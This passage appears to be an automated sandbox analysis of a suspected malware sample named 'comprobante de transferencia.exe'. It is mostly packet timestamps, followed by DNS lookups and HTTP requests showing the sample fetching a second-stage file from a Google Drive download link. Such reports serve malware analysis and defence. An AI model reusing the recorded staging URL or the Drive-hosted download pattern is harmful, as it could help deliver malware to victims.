                                          Mar 18, 2024 15:06:45.921659946 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.921837091 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.925683975 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.925945044 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.926001072 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.926229954 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.930073977 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.930289984 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.930362940 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.930545092 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.934295893 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.934499979 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.934559107 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.934813023 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.938532114 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.938796997 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.938878059 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.939062119 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.943378925 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.943569899 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.943643093 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.943835020 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.947262049 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.947438002 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.947494984 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.947680950 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.950695992 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.950885057 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.950922966 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.951103926 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.955965042 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.956134081 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.956170082 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.956340075 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.958127022 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.958306074 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.958343983 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.958512068 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.961905003 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.962073088 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.964334965 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.964689016 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.964716911 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.964855909 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.968110085 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.968311071 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.968321085 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.968523979 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.971559048 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.971729994 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.971740961 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.971956015 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.973984957 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.974134922 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.974877119 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.975032091 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.976330996 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.976475000 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.977485895 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.977663994 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.979274988 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.979425907 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.979434013 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.979568005 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.981151104 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.981316090 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.981326103 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.981479883 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.983639956 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.984092951 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.984102011 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.984247923 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.985882044 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.986028910 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.986041069 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.986185074 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.988075972 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.988257885 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.988269091 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.988423109 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.990417957 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.990624905 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.990633965 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.990811110 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.993136883 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.993297100 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.993307114 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.993439913 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.995348930 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.995532990 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.995906115 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.996118069 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.996126890 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.996259928 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.998538971 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.998692036 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:45.998703003 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:45.998833895 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.000272036 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.000432968 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.000443935 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.000588894 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.002437115 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.002603054 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.002612114 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.002774954 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.004581928 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.004785061 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.004810095 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.004945040 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.006767988 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.006923914 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.006934881 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.007101059 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.009139061 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.009341955 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.009352922 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.009507895 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.010780096 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.010925055 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.010946989 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.011106968 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.012806892 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.012984037 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.012994051 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.013096094 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.014761925 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.014941931 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.014952898 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.015098095 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.016788006 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.016978025 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.016988039 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.017126083 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.018969059 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.019103050 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.019129992 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.019284010 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.020581961 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.020726919 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.021619081 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.021766901 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.021775961 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.021923065 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.023514032 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.023833036 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.023843050 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.024003029 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.025366068 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.025549889 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.025561094 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.025706053 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.027363062 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.027543068 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.027551889 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.027733088 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.029055119 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.029202938 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.029213905 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.029350996 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.030958891 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.031141043 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.031150103 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.031282902 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.032685995 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.032831907 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.032845974 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.033014059 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.034774065 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.034939051 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.034950018 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.035106897 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.036375999 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.036524057 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.036536932 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.036770105 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.038135052 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.038291931 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.038305044 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.038472891 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.040005922 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.040241957 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.040251970 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.040383101 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.041702986 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.041867018 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.041878939 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.042021036 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.043509960 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.043662071 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.044337034 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.044478893 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.044488907 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.044723034 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.046128988 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.046293974 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.046305895 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.046498060 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.047842026 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.048028946 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.048039913 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.048178911 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.049546003 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.049726009 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.049736977 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.049913883 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.051249027 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.051461935 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.051476955 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.051616907 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.052880049 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.053056002 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.053066015 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.053606987 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.054649115 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.054805994 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.054821968 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.054958105 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.056262970 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.056404114 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.056416035 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.056555986 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.057797909 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.057949066 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.057965994 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.058123112 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.059453964 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.059670925 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.059681892 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.059858084 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.061192036 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.061387062 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.061398029 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.061562061 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.062849998 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.063019037 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.063030958 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.063199043 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.064302921 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.064460993 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.065159082 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.065320015 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.065335035 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.065562963 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.066759109 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.066935062 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.066945076 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.067143917 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.068372965 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.068516016 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.068527937 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.068701982 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.070838928 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.070982933 CET44349785142.251.41.1192.168.11.20
                                          Mar 18, 2024 15:06:46.070987940 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.071118116 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.071182013 CET49785443192.168.11.20142.251.41.1
                                          Mar 18, 2024 15:06:46.071196079 CET44349785142.251.41.1192.168.11.20
                                          TimestampSource PortDest PortSource IPDest IP
                                          Mar 18, 2024 15:06:44.086272955 CET5502953192.168.11.201.1.1.1
                                          Mar 18, 2024 15:06:44.181320906 CET53550291.1.1.1192.168.11.20
                                          Mar 18, 2024 15:06:44.818701982 CET5160053192.168.11.201.1.1.1
                                          Mar 18, 2024 15:06:44.914122105 CET53516001.1.1.1192.168.11.20
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Mar 18, 2024 15:06:44.086272955 CET192.168.11.201.1.1.10xe3dStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                          Mar 18, 2024 15:06:44.818701982 CET192.168.11.201.1.1.10xcffStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Mar 18, 2024 15:06:44.181320906 CET1.1.1.1192.168.11.200xe3dNo error (0)drive.google.com142.251.40.142A (IP address)IN (0x0001)false
                                          Mar 18, 2024 15:06:44.914122105 CET1.1.1.1192.168.11.200xcffNo error (0)drive.usercontent.google.com142.251.41.1A (IP address)IN (0x0001)false
                                          • drive.google.com
                                          • drive.usercontent.google.com
                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.11.2049784142.251.40.1424438496C:\Users\user\Desktop\comprobante de transferencia.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-18 14:06:44 UTC216OUTGET /uc?export=download&id=1ZlWTWjrz48C7pJUuwTOgfOjeHFK1G_7k HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                          Host: drive.google.com
                                          Cache-Control: no-cache
                                          2024-03-18 14:06:44 UTC1582INHTTP/1.1 303 See Other
                                          Content-Type: application/binary
                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                          Pragma: no-cache
                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                          Date: Mon, 18 Mar 2024 14:06:44 GMT
                                          Location: https://drive.usercontent.google.com/download?id=1ZlWTWjrz48C7pJUuwTOgfOjeHFK1G_7k&export=download
                                          Strict-Transport-Security: max-age=31536000
                                          Content-Security-Policy: script-src 'nonce-M5VD8Gb4omLcPfvkagKpOg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                          Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                          Cross-Origin-Opener-Policy: same-origin
                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                          Server: ESF
                                          Content-Length: 0
                                          X-XSS-Protection: 0
                                          X-Frame-Options: SAMEORIGIN
                                          X-Content-Type-Options: nosniff
                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.11.2049785142.251.41.14438496C:\Users\user\Desktop\comprobante de transferencia.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-18 14:06:45 UTC258OUTGET /download?id=1ZlWTWjrz48C7pJUuwTOgfOjeHFK1G_7k&export=download HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                          Cache-Control: no-cache
                                          Host: drive.usercontent.google.com
                                          Connection: Keep-Alive
                                          2024-03-18 14:06:45 UTC4687INHTTP/1.1 200 OK
                                          X-GUploader-UploadID: ABPtcPoAuImEbEVYNl7ncK1SJnEHiiWRVDcbNPY4DaT6coRfTrbIq0Ku-iToSbWMWsuYY8vj5udY36B7vw
                                          Content-Type: application/octet-stream
                                          Content-Security-Policy: sandbox
                                          Content-Security-Policy: default-src 'none'
                                          Content-Security-Policy: frame-ancestors 'none'
                                          X-Content-Security-Policy: sandbox
                                          Cross-Origin-Opener-Policy: same-origin
                                          Cross-Origin-Embedder-Policy: require-corp
                                          Cross-Origin-Resource-Policy: same-site
                                          X-Content-Type-Options: nosniff
                                          Content-Disposition: attachment; filename="msPIfB156.bin"
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Credentials: false
                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, 